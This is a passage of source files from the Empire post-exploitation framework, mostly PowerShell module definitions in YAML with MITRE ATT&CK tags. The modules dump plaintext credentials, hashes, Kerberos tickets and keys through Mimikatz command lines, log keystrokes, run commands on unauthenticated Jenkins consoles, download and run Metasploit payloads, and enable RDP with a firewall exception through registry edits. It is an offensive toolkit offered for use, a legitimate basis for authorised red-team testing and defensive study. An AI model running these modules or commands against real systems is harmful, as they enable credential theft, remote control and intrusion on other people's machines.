23 |   - name: Agent
24 |     description: Agent to run module on.
25 |     required: true
26 |     value: ''
27 |   - name: ipyscript
28 |     description: Base64 encoded IronPython code
29 |     required: true
30 |     value: ''
31 | script_path: code_execution/Invoke-IronPython.ps1
32 | script_end: Invoke-IronPython {{ PARAMS }}
33 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/code_execution/invoke_ironpython3.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-IronPython3
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 |   - name: ''
 7 |     handle: '@byt3bl33d3r'
 8 |     link: https://twitter.com/byt3bl33d3r
 9 | description: Executes IronPython3 code using the embedded IPY engine.
10 | software: ''
11 | tactics: [TA0002, TA0005]
12 | techniques: [T1059, T1620]
13 | background: false
14 | output_extension:
15 | needs_admin: false
16 | opsec_safe: true
17 | language: powershell
18 | min_language_version: '2'
19 | comments:
20 |   - https://github.com/BC-SECURITY/OffensiveDLR
21 |   - https://github.com/byt3bl33d3r/OffensiveDLR
22 | options:
23 |   - name: Agent
24 |     description: Agent to run module on.
25 |     required: true
26 |     value: ''
27 |   - name: ipyscript
28 |     description: Base64 encoded IronPython3 code
29 |     required: true
30 |     value: ''
31 | script_path: code_execution/Invoke-IronPython3.ps1
32 | script_end: Invoke-IronPython3 {{ PARAMS }}
33 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/code_execution/invoke_metasploitpayload.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-MetasploitPayload
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@jaredhaight'
 5 |     link: ''
 6 | description: Spawns a new, hidden PowerShell window that downloadsand executes a
 7 |   Metasploit payload. This relies on theexploit/multi/scripts/web_delivery metasploit
 8 |   module.
 9 | software: ''
10 | tactics: [TA0002]
11 | techniques: [T1055]
12 | background: false
13 | output_extension:
14 | needs_admin: false
15 | opsec_safe: true
16 | language: powershell
17 | min_language_version: '2'
18 | comments:
19 |   - https://github.com/jaredhaight/Invoke-MetasploitPayload/
20 | options:
21 |   - name: Agent
22 |     description: Agent to run Metasploit payload on.
23 |     required: true
24 |     value: ''
25 |   - name: URL
26 |     description: URL from the Metasploit web_delivery module
27 |     required: true
28 |     value: ''
29 | script_path: code_execution/Invoke-MetasploitPayload.ps1
30 | script_end: Invoke-MetasploitPayload {{ PARAMS }}
31 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/code_execution/invoke_ssharp.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-SSharp
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@byt3bl33d3r'
 5 |     link: https://twitter.com/byt3bl33d3r
 6 |   - name: Anthony Rose
 7 |     handle: '@Cx01N'
 8 |     link: https://twitter.com/Cx01N_
 9 | description: Executes SSharp from an embedded compiler within PowerShell. Compilation
10 |   does not call csc.exe
11 | software: ''
12 | tactics: [TA0002, TA0005]
13 | techniques: [T1059, T1620]
14 | background: true
15 | output_extension:
16 | needs_admin: false
17 | opsec_safe: true
18 | language: powershell
19 | min_language_version: '2'
20 | comments:
21 |   - https://github.com/PetroProtsyk/SSharp
22 |   - https://github.com/byt3bl33d3r/OffensiveDLR
23 |   - https://github.com/BC-SECURITY/OffensiveDLR
24 | options:
25 |   - name: Agent
26 |     description: Agent to run module on.
27 |     required: true
28 |     value: ''
29 |   - name: source
30 |     description: Base64 encoded SSharp code
31 |     required: true
32 |     value: ''
33 | script_path: code_execution/Invoke-SSharp.ps1
34 | script_end: Invoke-SSharp {{ PARAMS }}
35 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/collection/USBKeylogger.yaml:
--------------------------------------------------------------------------------
 1 | name: Get-USBKeyStrokes
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@Conjectural_hex'
 5 |     link: ''
 6 |   - name: ''
 7 |     handle: '@CyberPoint_SRT'
 8 |     link: ''
 9 | description: Logs USB keys pressed using Event Tracing for Windows (ETW)
10 | software: ''
11 | tactics: [TA0006, TA0009]
12 | techniques: [T1056.001]
13 | background: true
14 | output_extension:
15 | needs_admin: true
16 | opsec_safe: true
17 | language: powershell
18 | min_language_version: '2'
19 | comments:
20 |   - https://github.com/CyberPoint/Ruxcon2016ETW/tree/master/KeyloggerPOC
21 |   - https://github.com/CyberPoint/ETWKeyLogger_PSE
22 |   - https://ruxcon.org.au/assets/2016/slides/ETW_16_RUXCON_NJR_no_notes.pdf
23 | options:
24 |   - name: Agent
25 |     description: Agent to run module on.
26 |     required: true
27 |     value: ''
28 | script_path: collection/Get-Keystrokes.ps1
29 | script_end: Get-USBKeystrokes {{ PARAMS }}
30 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/collection/screenshot.yaml:
--------------------------------------------------------------------------------
 1 | name: Get-Screenshot
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@obscuresec'
 5 |     link: ''
 6 |   - name: Will Schroeder
 7 |     handle: '@harmj0y'
 8 |     link: https://twitter.com/harmj0y
 9 | description: Takes a screenshot of the current desktop and returns the output as
10 |   a .PNG.
11 | software: ''
12 | tactics: [TA0009]
13 | techniques: [T1113]
14 | background: false
15 | output_extension: png
16 | needs_admin: false
17 | opsec_safe: true
18 | language: powershell
19 | min_language_version: '2'
20 | comments:
21 |   - https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-TimedScreenshot.ps1
22 | options:
23 |   - name: Agent
24 |     description: Agent to run module on.
25 |     required: true
26 |     value: ''
27 |   - name: Ratio
28 |     description: 'JPEG Compression ratio: 1 to 100.'
29 |     required: false
30 |     value: ''
31 | script_path: collection/Get-Screenshot.ps1
32 | advanced:
33 |   custom_generate: true
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/credentials/enum_cred_store.yaml:
--------------------------------------------------------------------------------
 1 | name: enum_cred_store
 2 | authors:
 3 |   - name: BeetleChunks
 4 |     handle: ''
 5 |     link: ''
 6 | description: Dumps plaintext credentials from the Windows Credential Manager for
 7 |   the current interactive user.
 8 | software: ''
 9 | tactics: [TA0006]
10 | techniques: [T1555.004, T1003]
11 | background: true
12 | output_extension:
13 | needs_admin: false
14 | opsec_safe: true
15 | language: powershell
16 | min_language_version: '2'
17 | comments:
18 |   - https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde'
19 | options:
20 |   - name: Agent
21 |     description: Agent to run module on.
22 |     required: true
23 |     value: ''
24 | script_path: credentials/dumpCredStore.ps1
25 | script_end: Invoke-X | %{$_ + "`n"}; 'enum_cred_store completed'
26 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/credentials/invoke_ntlmextract.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-NTLMExtract
 2 | authors:
 3 |   - name: Tobias Heilig
 4 |     handle: ''
 5 |     link: ''
 6 | description: Extract local NTLM password hashes from the registry.
 7 | software: ''
 8 | tactics: [TA0006]
 9 | techniques: [T1003.002, T1552.002]
10 | background: true
11 | output_extension:
12 | needs_admin: true
13 | opsec_safe: true
14 | language: powershell
15 | min_language_version: '2'
16 | comments:
17 |   - https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/NTLMExtract.ps1
18 | options:
19 |   - name: Agent
20 |     description: Agent to run module on.
21 |     required: true
22 |     value: ''
23 | script_path: credentials/Invoke-NTLMExtract.ps1
24 | script_end: Invoke-NTLMExtract
25 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/credentials/mimikatz/cache.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-Mimikatz LSA Dump
 2 | authors:
 3 |   - name: Joseph Bialek
 4 |     handle: '@JosephBialek'
 5 |     link: https://twitter.com/JosephBialek
 6 |   - name: Benjamin Delpy
 7 |     handle: '@gentilkiwi'
 8 |     link: https://twitter.com/gentilkiwi
 9 | description: Runs PowerSploit's Invoke-Mimikatz function to extract MSCache(v2) hashes.
10 | software: S0002
11 | tactics: [TA0004, TA0006]
12 | techniques: [T1003.004, T1552.002, T1134.001]
13 | background: true
14 | output_extension:
15 | needs_admin: true
16 | opsec_safe: true
17 | language: powershell
18 | min_language_version: '2'
19 | comments:
20 |   - http://clymb3r.wordpress.com/
21 |   - http://blog.gentilkiwi.com
22 |   - https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#lsa
23 | options:
24 |   - name: Agent
25 |     description: Agent to run module on.
26 |     required: true
27 |     value: ''
28 | script_path: credentials/Invoke-Mimikatz.ps1
29 | script_end: Invoke-Mimikatz -Command '"token::elevate" "lsadump::cache" "token::revert"';
30 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/credentials/mimikatz/certs.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-Mimikatz DumpCerts
 2 | authors:
 3 |   - name: Joseph Bialek
 4 |     handle: '@JosephBialek'
 5 |     link: https://twitter.com/JosephBialek
 6 |   - name: Benjamin Delpy
 7 |     handle: '@gentilkiwi'
 8 |     link: https://twitter.com/gentilkiwi
 9 | description: Runs PowerSploit's Invoke-Mimikatz function to extract all certificates
10 |   to the local directory.
11 | software: S0002
12 | tactics: [TA0006]
13 | techniques: [T1003.004, T1552.002, T1555.004, T1134.001]
14 | background: true
15 | output_extension:
16 | needs_admin: true
17 | opsec_safe: true
18 | language: powershell
19 | min_language_version: '2'
20 | comments:
21 |   - http://clymb3r.wordpress.com/
22 |   - http://blog.gentilkiwi.com
23 | options:
24 |   - name: Agent
25 |     description: Agent to run module on.
26 |     required: true
27 |     value: ''
28 | script_path: credentials/Invoke-Mimikatz.ps1
29 | script_end: Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates
30 |   /systemstore:local_machine /store:root /export"'
31 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/credentials/mimikatz/extract_tickets.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-Mimikatz extract kerberos tickets.
 2 | authors:
 3 |   - name: Joseph Bialek
 4 |     handle: '@JosephBialek'
 5 |     link: https://twitter.com/JosephBialek
 6 |   - name: Benjamin Delpy
 7 |     handle: '@gentilkiwi'
 8 |     link: https://twitter.com/gentilkiwi
 9 | description: Runs PowerSploit's Invoke-Mimikatz function to extract kerberos tickets
10 |   from memory in base64-encoded form.
11 | software: S0002
12 | tactics: [TA0006]
13 | techniques: [T1003.001]
14 | background: true
15 | output_extension:
16 | needs_admin: false
17 | opsec_safe: true
18 | language: powershell
19 | min_language_version: '2'
20 | comments:
21 |   - http://clymb3r.wordpress.com/
22 |   - http://blog.gentilkiwi.com
23 | options:
24 |   - name: Agent
25 |     description: Agent to run module on.
26 |     required: true
27 |     value: ''
28 | script_path: credentials/Invoke-Mimikatz.ps1
29 | script_end: Invoke-Mimikatz -Command '"standard::base64" "kerberos::list /export"'
30 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/credentials/mimikatz/keys.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-Mimikatz DumpKeys
 2 | authors:
 3 |   - name: Joseph Bialek
 4 |     handle: '@JosephBialek'
 5 |     link: https://twitter.com/JosephBialek
 6 |   - name: Benjamin Delpy
 7 |     handle: '@gentilkiwi'
 8 |     link: https://twitter.com/gentilkiwi
 9 | description: Runs PowerSploit's Invoke-Mimikatz function to extract all keys to the
10 |   local directory.
11 | software: S0002
12 | tactics: [TA0006]
13 | techniques: [T1003.004, T1552.002, T1555.004, T1134.001]
14 | background: true
15 | output_extension:
16 | needs_admin: true
17 | opsec_safe: true
18 | language: powershell
19 | min_language_version: '2'
20 | comments:
21 |   - http://clymb3r.wordpress.com/
22 |   - http://blog.gentilkiwi.com
23 | options:
24 |   - name: Agent
25 |     description: Agent to run module on.
26 |     required: true
27 |     value: ''
28 | script_path: credentials/Invoke-Mimikatz.ps1
29 | script_end: Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::keys
30 |   /export"'
31 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/credentials/mimikatz/logonpasswords.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-Mimikatz DumpCreds
 2 | authors:
 3 |   - name: Joseph Bialek
 4 |     handle: '@JosephBialek'
 5 |     link: https://twitter.com/JosephBialek
 6 |   - name: Benjamin Delpy
 7 |     handle: '@gentilkiwi'
 8 |     link: https://twitter.com/gentilkiwi
 9 | description: |
10 |   Runs PowerSploit's Invoke-Mimikatz function to extract plaintext credentials from memory.
11 | software: S0002
12 | tactics: [TA0006]
13 | techniques: [T1003.001, T1003.004, T1134.001]
14 | background: true
15 | output_extension:
16 | needs_admin: true
17 | opsec_safe: true
18 | language: powershell
19 | min_language_version: '2'
20 | comments:
21 |   - http://clymb3r.wordpress.com/
22 |   - http://blog.gentilkiwi.com
23 | options: []
24 | script_path: credentials/Invoke-Mimikatz.ps1
25 | script_end: Invoke-Mimikatz -DumpCreds; {{ PARAMS }}
26 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/credentials/mimikatz/purge.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-Mimikatz Golden Ticket
 2 | authors:
 3 |   - name: Joseph Bialek
 4 |     handle: '@JosephBialek'
 5 |     link: https://twitter.com/JosephBialek
 6 |   - name: Benjamin Delpy
 7 |     handle: '@gentilkiwi'
 8 |     link: https://twitter.com/gentilkiwi
 9 | description: Runs PowerSploit's Invoke-Mimikatz function to purge all current kerberos
10 |   tickets from memory.
11 | software: S0002
12 | tactics: [TA0005]
13 | techniques: [T1078.002]
14 | background: true
15 | output_extension:
16 | needs_admin: false
17 | opsec_safe: true
18 | language: powershell
19 | min_language_version: '2'
20 | comments:
21 |   - http://clymb3r.wordpress.com/
22 |   - http://blog.gentilkiwi.com
23 |   - https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos
24 | options:
25 |   - name: Agent
26 |     description: Agent to run module on.
27 |     required: true
28 |     value: ''
29 | script_path: credentials/Invoke-Mimikatz.ps1
30 | script_end: Invoke-Mimikatz -Command '"kerberos::purge"'
31 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/credentials/mimikatz/sam.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-Mimikatz SAM dump
 2 | authors:
 3 |   - name: Joseph Bialek
 4 |     handle: '@JosephBialek'
 5 |     link: https://twitter.com/JosephBialek
 6 |   - name: Benjamin Delpy
 7 |     handle: '@gentilkiwi'
 8 |     link: https://twitter.com/gentilkiwi
 9 | description: Runs PowerSploit's Invoke-Mimikatz function to extract hashes from the
10 |   Security Account Managers (SAM) database.
11 | software: S0002
12 | tactics: [TA0006]
13 | techniques: [T1003.002]
14 | background: true
15 | output_extension:
16 | needs_admin: true
17 | opsec_safe: true
18 | language: powershell
19 | min_language_version: '2'
20 | comments:
21 |   - http://clymb3r.wordpress.com/
22 |   - http://blog.gentilkiwi.com
23 |   - https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#lsa
24 | options:
25 |   - name: Agent
26 |     description: Agent to run module on.
27 |     required: true
28 |     value: ''
29 | script_path: credentials/Invoke-Mimikatz.ps1
30 | script_end: Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam" "token::revert"';
31 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/credentials/mimikatz/terminal_server.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-Mimikatz Dump Terminal Server Passwords
 2 | authors:
 3 |   - name: Joseph Bialek
 4 |     handle: '@JosephBialek'
 5 |     link: https://twitter.com/JosephBialek
 6 |   - name: Benjamin Delpy
 7 |     handle: '@gentilkiwi'
 8 |     link: https://twitter.com/gentilkiwi
 9 | description: |
10 |   Runs PowerSploit's Invoke-Mimikatz function to extract plaintext RDP credentials from memory.
11 | software: S0002
12 | tactics: [TA0006]
13 | techniques: [T1003.001]
14 | background: true
15 | output_extension:
16 | needs_admin: true
17 | opsec_safe: true
18 | language: powershell
19 | min_language_version: '2'
20 | comments:
21 |   - https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210531
22 |   - https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
23 | options:
24 |   - name: Agent
25 |     description: Agent to run module on.
26 |     required: true
27 |     value: ''
28 | script_path: credentials/Invoke-Mimikatz.ps1
29 | script_end: |
30 |   Invoke-Mimikatz -Command '"privilege::debug" "ts::logonpasswords" "exit"';
31 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/exploitation/exploit_jenkins.yaml:
--------------------------------------------------------------------------------
 1 | name: Exploit-Jenkins
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@luxcupitor'
 5 |     link: ''
 6 | description: Run command on unauthenticated Jenkins Script consoles.
 7 | software: ''
 8 | tactics: [TA0008]
 9 | techniques: [T1210]
10 | background: true
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: false
14 | language: powershell
15 | min_language_version: '2'
16 | comments:
17 |   - Pass a command to run. If windows, you may have to prepend "cmd /c ".
18 | options:
19 |   - name: Agent
20 |     description: Agent to run module on.
21 |     required: true
22 |     value: ''
23 |   - name: Rhost
24 |     description: Specify the host to exploit.
25 |     required: true
26 |     value: ''
27 |   - name: Port
28 |     description: Specify the port to use.
29 |     required: true
30 |     value: '8080'
31 |   - name: Cmd
32 |     description: command to run on remote jenkins script console.
33 |     required: true
34 |     value: whoami
35 | script_path: exploitation/Exploit-Jenkins.ps1
36 | script_end: Exploit-Jenkins {{ PARAMS }}
37 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/lateral_movement/invoke_portfwd.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-PortFwd
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@decoder-it'
 5 |     link: ''
 6 | description: Forward a port with no admin rights required.
 7 | software: ''
 8 | tactics: [TA0011]
 9 | techniques: [T1090.001]
10 | background: true
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: false
14 | language: powershell
15 | min_language_version: '2'
16 | comments:
17 |   - Inspired by @IppSec (https://youtu.be/6l4ZIKwzW8U)
18 |   - https://github.com/decoder-it/psportfwd
19 | options:
20 |   - name: Lhost
21 |     description: Local IP address.
22 |     required: true
23 |     value: ''
24 |   - name: Lport
25 |     description: Local port to listen on.
26 |     required: true
27 |     value: ''
28 |   - name: Rhost
29 |     description: Remote IP address.
30 |     required: true
31 |     value: ''
32 |   - name: Rport
33 |     description: Remote port to forward to.
34 |     required: true
35 |     value: ''
36 | script_path: lateral_movement/Invoke-PortFwd.ps1
37 | script_end: Invoke-PortFwd {{ PARAMS }}
38 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/management/disable_rdp.yaml:
--------------------------------------------------------------------------------
 1 | name: Disable-RDP
 2 | authors:
 3 |   - name: Will Schroeder
 4 |     handle: '@harmj0y'
 5 |     link: https://twitter.com/harmj0y
 6 | description: Disables RDP on the remote machine.
 7 | software: ''
 8 | tactics: [TA0005, TA0040]
 9 | techniques: [T1021.001, T1490]
10 | background: false
11 | output_extension:
12 | needs_admin: true
13 | opsec_safe: false
14 | language: powershell
15 | min_language_version: '2'
16 | comments: []
17 | options:
18 |   - name: Agent
19 |     description: Agent to run module on.
20 |     required: true
21 |     value: ''
22 | script: |
23 |   reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f;
24 |   if ($?) { $null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 1 /f }
25 |   "`n Disable-RDP completed!"
26 | script_end: ''
27 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/management/enable_multi_rdp.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-Mimikatz Multirdp
 2 | authors:
 3 |   - name: Benjamin Delpy
 4 |     handle: '@gentilkiwi'
 5 |     link: https://twitter.com/gentilkiwi
 6 |   - name: Joseph Bialek
 7 |     handle: '@JosephBialek'
 8 |     link: https://twitter.com/JosephBialek
 9 | description: "[!] WARNING: Experimental! Runs PowerSploit's Invoke-Mimikatz function
10 |   to patch the Windows terminal service to allow multiple users to establish simultaneous
11 |   RDP connections."
12 | software: ''
13 | tactics: [TA0005, TA0008]
14 | techniques: [T1021.001, T1562]
15 | background: true
16 | output_extension:
17 | needs_admin: true
18 | opsec_safe: false
19 | language: powershell
20 | min_language_version: '2'
21 | comments:
22 |   - http://blog.gentilkiwi.com
23 |   - http://clymb3r.wordpress.com/
24 | options:
25 |   - name: Agent
26 |     description: Agent to run module on.
27 |     required: true
28 |     value: ''
29 | script_path: credentials/Invoke-Mimikatz.ps1
30 | script_end: Invoke-Mimikatz -Command '"ts::multirdp"';
31 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/management/enable_rdp.yaml:
--------------------------------------------------------------------------------
 1 | name: Enable-RDP
 2 | authors:
 3 |   - name: Will Schroeder
 4 |     handle: '@harmj0y'
 5 |     link: https://twitter.com/harmj0y
 6 | description: Enables RDP on the remote machine and adds a firewall exception.
 7 | software: ''
 8 | tactics: [TA0005, TA0008]
 9 | techniques: [T1021.001, T1112]
10 | background: false
11 | output_extension:
12 | needs_admin: true
13 | opsec_safe: false
14 | language: powershell
15 | min_language_version: '2'
16 | comments: []
17 | options:
18 |   - name: Agent
19 |     description: Agent to run module on.
20 |     required: true
21 |     value: ''
22 | script: |
23 |   reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f;
24 |   if($?) {$null = netsh firewall set service type = remotedesktop mod = enable;
25 |     $null = reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f }
26 |   "`n Enable-RDP completed!"
27 | script_end: ''
28 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/management/honeyhash.yaml:
--------------------------------------------------------------------------------
 1 | name: New-HoneyHash
 2 | authors:
 3 |   - name: Matt Graeber
 4 |     handle: '@mattifestation'
 5 |     link: https://twitter.com/mattifestation
 6 | description: Inject artificial credentials into LSASS.
 7 | software: ''
 8 | tactics: [TA0003]
 9 | techniques: [T1156.001]
10 | background: false
11 | output_extension:
12 | needs_admin: true
13 | opsec_safe: true
14 | language: powershell
15 | min_language_version: '2'
16 | comments:
17 |   - https://isc.sans.edu/diary/Detecting+Mimikatz+Use+On+Your+Network/19311/
18 | options:
19 |   - name: Agent
20 |     description: Agent to run module on.
21 |     required: true
22 |     value: ''
23 |   - name: Domain
24 |     description: Specifies the fake domain.
25 |     required: true
26 |     value: ''
27 |   - name: UserName
28 |     description: Specifies the fake user name.
29 |     required: true
30 |     value: ''
31 |   - name: Password
32 |     description: Specifies the fake password.
33 |     required: true
34 |     value: ''
35 | script_path: management/New-HoneyHash.ps1
36 | script_end: New-HoneyHash {{ PARAMS }}
37 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/management/invoke-downloadfile.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-DownloadFile
 2 | authors:
 3 |   - name: Cx01N
 4 |     handle: ''
 5 |     link: ''
 6 | description: Download files from the internet through PowerShell.
 7 | software: ''
 8 | tactics: [TA0010]
 9 | techniques: [T1041]
10 | background: true
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: powershell
15 | min_language_version: '2'
16 | comments:
17 |   - https://github.com/Smalls1652/Get-RandomPowerShellScripts/blob/master/Actions/Networking/Invoke-DownloadFile.ps1
18 | options:
19 |   - name: Agent
20 |     description: Agent to run module on.
21 |     required: true
22 |     value: ''
23 |   - name: Url
24 |     description: Remote directory to download file from.
25 |     required: true
26 |     value: ''
27 | script_path: management/Invoke-DownloadFile.ps1
28 | script_end: Invoke-DownloadFile {{ PARAMS }}
29 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/management/logoff.py:
--------------------------------------------------------------------------------
 1 | from empire.server.common.empire import MainMenu
 2 | from empire.server.core.module_models import EmpireModule
 3 | 
 4 | 
 5 | class Module:
 6 |     @staticmethod
 7 |     def generate(
 8 |         main_menu: MainMenu,
 9 |         module: EmpireModule,
10 |         params: dict,
11 |         obfuscate: bool = False,
12 |         obfuscation_command: str = "",
13 |     ):
14 |         all_users = params["AllUsers"]
15 | 
16 |         if all_users.lower() == "true":
17 |             script = "'Logging off all users.'; Start-Sleep -s 3; $null = (gwmi win32_operatingsystem).Win32Shutdown(4)"
18 |         else:
19 |             script = "'Logging off current user.'; Start-Sleep -s 3; shutdown /l /f"
20 | 
21 |         return main_menu.modulesv2.finalize_module(
22 |             script=script,
23 |             script_end="",
24 |             obfuscate=obfuscate,
25 |             obfuscation_command=obfuscation_command,
26 |         )
27 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/management/logoff.yaml:
--------------------------------------------------------------------------------
 1 | name: Logoff User
 2 | authors:
 3 |   - name: Will Schroeder
 4 |     handle: '@harmj0y'
 5 |     link: https://twitter.com/harmj0y
 6 | description: Logs the current user (or all users) off the machine.
 7 | software: ''
 8 | tactics: [TA0040]
 9 | techniques: [T1098, T1529]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: false
14 | language: powershell
15 | min_language_version: '2'
16 | comments: []
17 | options:
18 |   - name: Agent
19 |     description: Agent to run module on.
20 |     required: true
21 |     value: ''
22 |   - name: AllUsers
23 |     description: Log off all current users.
24 |     required: false
25 |     value: 'False'
26 |     strict: true
27 |     suggested_values:
28 |       - True
29 |       - False
30 | advanced:
31 |   custom_generate: true
32 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/management/restart.yaml:
--------------------------------------------------------------------------------
 1 | name: Restart-Computer
 2 | authors:
 3 |   - name: Will Schroeder
 4 |     handle: '@harmj0y'
 5 |     link: https://twitter.com/harmj0y
 6 | description: Restarts the specified machine.
 7 | software: ''
 8 | tactics: [TA0040]
 9 | techniques: [T1529]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: false
14 | language: powershell
15 | min_language_version: '2'
16 | comments: []
17 | options:
18 |   - name: Agent
19 |     description: Agent to run module on.
20 |     required: true
21 |     value: ''
22 | script: |
23 |   "'Restarting computer';Restart-Computer -Force"
24 | script_end: ''
25 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/management/sid_to_user.yaml:
--------------------------------------------------------------------------------
 1 | name: SID-to-User
 2 | authors:
 3 |   - name: Will Schroeder
 4 |     handle: '@harmj0y'
 5 |     link: https://twitter.com/harmj0y
 6 | description: Converts a specified domain sid to a user.
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1098, T1087.002]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: powershell
15 | min_language_version: '2'
16 | comments: []
17 | options:
18 |   - name: Agent
19 |     description: Agent to run module on.
20 |     required: true
21 |     value: ''
22 |   - name: SID
23 |     description: Domain SID to translate.
24 |     required: true
25 |     value: ''
26 | script: |
27 |   function Invoke-sid_to_user
28 |   {
29 |       [CmdletBinding()]
30 |       Param(
31 |           [Parameter(Mandatory = $true)]
32 |           [string]
33 |           $sid
34 |           )
35 |       (New-Object System.Security.Principal.SecurityIdentifier("$sid")).Translate( [System.Security.Principal.NTAccount]).Value
36 |   }
37 | script_end: Invoke-sid_to_user {{ PARAMS }}
38 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/management/switch_listener.yaml:
--------------------------------------------------------------------------------
 1 | name: Switch-Listener
 2 | authors:
 3 |   - name: Will Schroeder
 4 |     handle: '@harmj0y'
 5 |     link: https://twitter.com/harmj0y
 6 | description: Overwrites the listener controller logic with the agent with the logic
 7 |   from generate_comms() for the specified listener.
 8 | software: ''
 9 | tactics: [TA0011]
10 | techniques: [T1008]
11 | background: false
12 | output_extension:
13 | needs_admin: false
14 | opsec_safe: true
15 | language: powershell
16 | min_language_version: '2'
17 | comments: []
18 | options:
19 |   - name: Agent
20 |     description: Agent to run module on.
21 |     required: true
22 |     value: ''
23 |   - name: Listener
24 |     description: Listener to switch agent comms to.
25 |     required: true
26 |     value: ''
27 | advanced:
28 |   custom_generate: true
29 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/management/user_to_sid.py:
--------------------------------------------------------------------------------
 1 | from empire.server.common.empire import MainMenu
 2 | from empire.server.core.module_models import EmpireModule
 3 | 
 4 | 
 5 | class Module:
 6 |     @staticmethod
 7 |     def generate(
 8 |         main_menu: MainMenu,
 9 |         module: EmpireModule,
10 |         params: dict,
11 |         obfuscate: bool = False,
12 |         obfuscation_command: str = "",
13 |     ):
14 |         script = '(New-Object System.Security.Principal.NTAccount("{}","{}")).Translate([System.Security.Principal.SecurityIdentifier]).Value'.format(
15 |             params["Domain"], params["User"]
16 |         )
17 | 
18 |         return main_menu.modulesv2.finalize_module(
19 |             script=script,
20 |             script_end="",
21 |             obfuscate=obfuscate,
22 |             obfuscation_command=obfuscation_command,
23 |         )
24 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/management/user_to_sid.yaml:
--------------------------------------------------------------------------------
 1 | name: User-to-SID
 2 | authors:
 3 |   - name: Will Schroeder
 4 |     handle: '@harmj0y'
 5 |     link: https://twitter.com/harmj0y
 6 | description: Converts a specified domain\user to a domain sid.
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1098, T1087.002]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: powershell
15 | min_language_version: '2'
16 | comments: []
17 | options:
18 |   - name: Agent
19 |     description: Agent to run module on.
20 |     required: true
21 |     value: ''
22 |   - name: Domain
23 |     description: Domain name for translation.
24 |     required: true
25 |     value: ''
26 |   - name: User
27 |     description: Username for translation.
28 |     required: true
